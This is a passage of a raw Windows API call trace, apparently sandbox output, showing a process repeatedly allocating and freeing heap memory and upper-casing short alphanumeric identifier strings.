[0214.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0214.761] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0214.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0214.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0214.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0214.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0214.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0214.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0214.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0214.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0214.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0214.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0214.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0214.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0214.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0214.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0214.762] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0214.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0214.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0214.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0214.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0214.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0214.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0214.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0214.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0214.763] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0214.763] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0214.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0214.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0214.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0214.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0214.764] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0214.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0214.764] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab3b0 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0214.764] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0214.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0214.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0214.765] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0214.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0214.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0214.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0214.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0214.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0214.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0214.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0214.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0214.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0214.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0214.765] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0214.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0214.765] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0214.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab548 [0214.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854860 [0214.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0214.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0214.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0214.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0214.765] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0214.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0214.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0214.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0214.766] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0214.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0214.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0214.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0214.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0214.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0214.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0214.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0214.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0214.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0214.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0214.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0214.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0214.766] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0214.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0214.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0214.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0214.766] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854860 | out: hHeap=0x2af0000) returned 1 [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0214.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0214.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0214.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0214.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0214.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0214.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0214.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0214.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0214.767] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0214.767] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0214.767] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854788 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0214.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0214.768] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0214.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0214.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0214.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0214.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6c8 | out: hHeap=0x2af0000) returned 1 [0214.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0214.768] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0214.768] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0214.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0214.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0214.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0214.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854788 | out: hHeap=0x2af0000) returned 1 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0214.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0214.769] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0214.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0214.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0214.769] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0214.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0214.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0214.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0214.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0214.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0214.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0214.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0214.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0214.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0214.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0214.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0214.770] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0214.770] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0214.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0214.770] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0214.770] 